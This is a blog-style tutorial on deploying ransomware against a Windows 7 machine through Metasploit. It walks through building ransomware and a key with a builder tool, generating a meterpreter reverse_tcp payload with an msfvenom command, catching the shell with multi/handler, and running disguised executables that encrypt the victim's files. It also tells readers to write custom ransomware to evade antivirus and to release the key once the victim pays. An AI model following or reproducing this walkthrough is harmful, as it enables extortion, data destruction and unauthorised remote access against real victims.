Ransomware Attack using Metasploit

By | September 12, 2021

In this article, we will be learning how to do a Ransomware attack on the Victim using Metasploit.


  • Parrot OS or Kali Linux or any Linux machine with Metasploit installed.
  • Windows 7 installed in VM.
  • Ransomware Builder:

U can download Ransomware builder from here.


First, we need to create Ransomware and its key using Ransomware builder.

Download the above application and execute it.

Check the options as shown below image, and upload the icon and the message image in the ransomware builder that you want to show to the victim.  

Then click on the build, it will create Ransomware for us, then create a key using the same application.

Now we having Ransomware and its key.

The next step is to make a Metasploit payload using msfvenom payload and get a Reverse shell from the victim machine so we can upload and execute our Ransomware into the victim’s machine.

I am using Metasploit Reverse_tcp payload to connect to the victim’s machine

Enter the command in your command prompt to create a payload.it will create a payload for us.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport=4444 -f exe -o /home/ravisarode/Desktop/payload.exe 

Now we having a payload to attack the victim machine, Ransomware, and its key.

These are the results of files in Virustotal, we created Ransomware and payload from well-known pentesting tools, so antiviruses will detect these files as malware, you can create your own Ransomware using python or any scripting language, to avoid detections from anti viruses.


Ransomware Key:

Msfvenom Payload:

The next step is to start msfconsole and set payload, LHOST, and LPORT and start listening connection from the victim, send our payload created from msfvenom to victim from any of medium, once the victim executed our payload we will get a Meterpreter Connection.

Set payload, LPORT, LHOST using multi/handler and listening for a reverse TCP connection.

The Attacker executed the application and I got a reverse TCP connection. Now I can perform  all the things that a normal owner of the machine can do.

This is the screenshot of the victim system before executing Ransomware 

Now upload the Ransomware that we had created using Ransomware Builder and execute it, in my case game.exe is Ransomware.

The Ransomware will execute in the victim machine and it encrypts all the files present in the victim machines and shows a massage as Desktop background that we had given while building Ransomware.

And we can see in the process Tree, that our payload which having a reverse_tcp connection has executed the Ransomware.

Notepadd.exe is our payload and game.exe is a Ransomware application.

After the victim sends money to us, send the Ransowmare key to the victim upload it to the victim machine, and execute it, all the files in the victim machine will decrypt automatically. in my case key, exe is Ransomware key.

After executing Ransomware key in Victim machine.

Thank you For Spending your valuable time reading my blog, u can send ur queries in the comment box.

Leave a Reply

Your email address will not be published. Required fields are marked *